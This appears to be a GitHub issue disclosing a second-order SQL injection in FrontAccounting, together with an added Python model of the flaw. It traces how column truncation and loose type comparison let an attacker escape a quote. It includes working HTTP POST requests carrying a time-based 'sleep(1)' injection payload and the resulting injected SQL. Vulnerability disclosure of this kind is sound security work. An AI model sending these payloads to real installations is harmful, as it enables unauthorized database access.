
SQL Injection #38

Closed
@Ginnz

Description


Sorry, this is my first time chatting with people in English.

FrontAccounting uses the function db_escape() to escape values, but some variables are not passed through db_escape().
Environment: docker mattrayner/lamp:latest-1604

0x00 Description

includes/db/class.reflines_db.inc:156
If I set the parameter $reference to something like 'XXXXXX\', the single quote can be escaped, and I can inject into the parameter $type.
[screenshot]
includes/references.inc:365
[screenshot]
admin/db/voiding_db.inc:127
[screenshot]
admin/void_transaction.php:316
[screenshot]
admin/void_transaction.php:352
[screenshot]
So the parameter $type can be controlled.
What about the parameter $reference?
[screenshots]
get_systype_db_info()
[screenshot]
After that I found some INSERT statements for the table grn_batch.
purchasing/includes/db/grn_db.inc:170
[screenshot]
purchasing/includes/db/grn_db.inc:99
[screenshot]
purchasing/po_receive_items.php:254
[screenshots]
So the parameter $reference can be controlled.

0x01 Bypass:

  1. PHP
    switch ($type)
    Here a variable $type like '25' is the same as '+25dasdsadasda'.
    [screenshots]
  2. MySQL
    Converting a string into an integer has some problems in MySQL.
    [screenshot]
    '25' = '25dasdasdasd' = '+25dasdasdasd'
    [screenshot]
    A string and an integer can be added together.
  3. MySQL has an SQL truncation problem, so '\' can be truncated.

0x02 POC:

A setting such as '001/2018\' will report an error, but '001/2018\' will not. I noticed that reference is 60 bytes, so I set the payload to 61 bytes, like 001100422222222222222222222201700422222222222222212222/2018\\. It is stored as 001100422222222222222222222201700422222222222222212222/2018\ in the database.

I am using po_entry_items.php, not the po_receive_items.php found above.
[screenshot]

POST /FA1/purchasing/po_entry_items.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1/purchasing/po_entry_items.php?NewGRN=Yes
Content-Type: application/octet-stream
Content-Length: 343
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=6qb35uj2b4sv26em7d6f5i7qv3; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=i96j3h5r6hl16smme7tl0t3ie3

supplier_id=1&OrderDate=12/31/2018&ref=001100422222222222222222222201700422222222222222212222/2018\\&supp_ref=&dimension=0&StkLocation=DEF&delivery_address=N/A&_stock_id_edit=102&stock_id=101&qty=1&price=200.00&Comments=&Commit=Process%20GRN&_focus=supplier_id&_modified=0&_confirmed=&_token=YNHuXfwn6xEZH7dUBa196wxx&_random=1078360.0430200463

Database:
[screenshots]

POST /FA1//admin/void_transaction.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1//admin/void_transaction.php
Content-Type: application/octet-stream
Content-Length: 261
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=3h40pcjb2t5apf0rlcblj1ahv6; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=1e2v29h21gv4efc5g2fr0fs0q0

filterType=%2b25%2c25)%20or%20sleep(1)%23&FromTransNo=1&ToTransNo=999999&date_=12/31/2018&memo_=&trans_no=3&selected_id=3&ConfirmVoiding=%u7EE7%u7EED%u8FDB%u884C&_focus=filterType&_modified=0&_confirmed=&_token=p6ySb5gc0z5JLK4DvaC9owxx&_random=578301.3136013072

The SQL statement that is finally executed looks like this:

SELECT * FROM 0_reflines WHERE trans_type='+25,25) or sleep(1)#' AND CHAR_LENGTH(`prefix`) AND LEFT('20170042222222222222222222220170042222222222222221222222221\', CHAR_LENGTH(`prefix`)) = `prefix` UNION SELECT * FROM 0_reflines WHERE trans_type='+25,25) and sleep(1)#' AND `prefix`=''
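The following is an added example, not the reporter's code and not FrontAccounting's own code. It is a small Python model of the three ingredients the report combines: loose string-to-integer conversion (PHP 7's switch/== and MySQL's cast of a string to INT both read only the leading signed digits; PHP 8 changed this), an escape-and-quote helper that is correct at insert time but undone when a non-strict MySQL server silently truncates a 61-character value into a 60-character column, and a query that interpolates the read-back reference and $type without escaping. The query shape is copied from the report's final statement; the 60-character width is the figure the report gives; db_escape, store_truncated, leading_int, sql_code_part and the sample inputs are invented here for illustration and are not FrontAccounting functions. sql_code_part shows which characters a MySQL parser would treat as code rather than string data, so the swallowed UNION and the attacker's "+25,25) or sleep(1)" landing outside any literal become visible, alongside a hardened builder that rejects the $type and escapes the reference at use time.

```python
import re

REF_COLUMN_WIDTH = 60  # assumed VARCHAR width of the reference column (per the report)


def leading_int(value: str) -> int:
    """Model of the two loose conversions the report relies on: PHP 7's
    `switch ($type)` matching a string against an int case, and MySQL
    casting a string to INT for `trans_type = '...'`. Both take the leading
    (optionally signed) digits and ignore the rest; no digits means 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def db_escape(value: str) -> str:
    """Model (not FrontAccounting's) of an escape-and-quote helper:
    backslash-escapes backslash and single quote, then wraps in quotes."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def store_truncated(raw_value: str, width: int = REF_COLUMN_WIDTH) -> str:
    """Model of a non-strict MySQL server (assumed sql_mode) writing an
    over-long value into VARCHAR(width): the literal was escaped correctly on
    the way in, the server decodes it back to raw_value, then silently cuts
    it to `width` characters. A value ending in two backslashes loses one."""
    return raw_value[:width]


def build_query_vulnerable(trans_type: str, reference: str) -> str:
    """Query shape from the report: $type and the reference read back from
    the database are interpolated without escaping."""
    where = ("WHERE trans_type='" + trans_type + "' AND CHAR_LENGTH(`prefix`) "
             "AND LEFT('" + reference + "', CHAR_LENGTH(`prefix`)) = `prefix`")
    return ("SELECT * FROM 0_reflines " + where + " UNION SELECT * FROM 0_reflines "
            "WHERE trans_type='" + trans_type + "' AND `prefix`=''")


def build_query_hardened(trans_type: str, reference: str) -> str:
    """Same query with two fixes: trans_type must be a plain integer (no
    loose prefix matching), and the reference is escaped when it is used,
    not only when it was inserted."""
    if not re.fullmatch(r"\d+", trans_type):
        raise ValueError("trans_type must be a plain integer")
    ref = db_escape(reference)
    where = ("WHERE trans_type=" + trans_type + " AND CHAR_LENGTH(`prefix`) "
             "AND LEFT(" + ref + ", CHAR_LENGTH(`prefix`)) = `prefix`")
    return ("SELECT * FROM 0_reflines " + where + " UNION SELECT * FROM 0_reflines "
            "WHERE trans_type=" + trans_type + " AND `prefix`=''")


def sql_code_part(query: str) -> str:
    """Return what a MySQL parser would treat as code: everything outside
    '...' literals (honouring backslash escapes) and before a `#` comment.
    Attacker-controlled text that shows up here is injected SQL."""
    out, in_str, i = [], False, 0
    while i < len(query):
        ch = query[i]
        if in_str:
            if ch == "\\":
                i += 1              # escaped character stays inside the literal
            elif ch == "'":
                in_str = False
        elif ch == "'":
            in_str = True
        elif ch == "#":
            break                   # rest of the line is a comment
        else:
            out.append(ch)
        i += 1
    return "".join(out)


# Constructed inputs in the shape of the report's payloads (not the real ones).
INJECTED_TYPE = "+25,25) or sleep(1)#"          # PHP 7 and MySQL both read this as 25
RAW_REFERENCE = "0" * 54 + "/2018\\\\"          # 61 chars, ends in two backslashes


def demo() -> dict:
    stored = store_truncated(RAW_REFERENCE)     # 60 chars, one trailing backslash
    vuln = sql_code_part(build_query_vulnerable(INJECTED_TYPE, stored))
    safe = sql_code_part(build_query_hardened("25", stored))
    try:
        build_query_hardened(INJECTED_TYPE, stored)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "type_reads_as_25": leading_int(INJECTED_TYPE),
        "stored_reference": stored,
        "vuln_code": vuln,      # ends in "LEFT(+25,25) or sleep(1)": UNION swallowed
        "safe_code": safe,      # reference stays inside its literal, UNION is code
        "hardened_rejects_type": rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In the vulnerable build, the trailing backslash left by truncation escapes the quote that should close the reference literal, so the literal runs on until the next quote in the UNION branch and the attacker's `+25,25) or sleep(1)` is parsed as code: `+25` is string-plus-integer arithmetic, `,25)` closes LEFT(), and `#` discards the rest. The hardened build has nothing to swallow because the reference is escaped where it is interpolated, and a $type that is not a plain integer never reaches the query.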
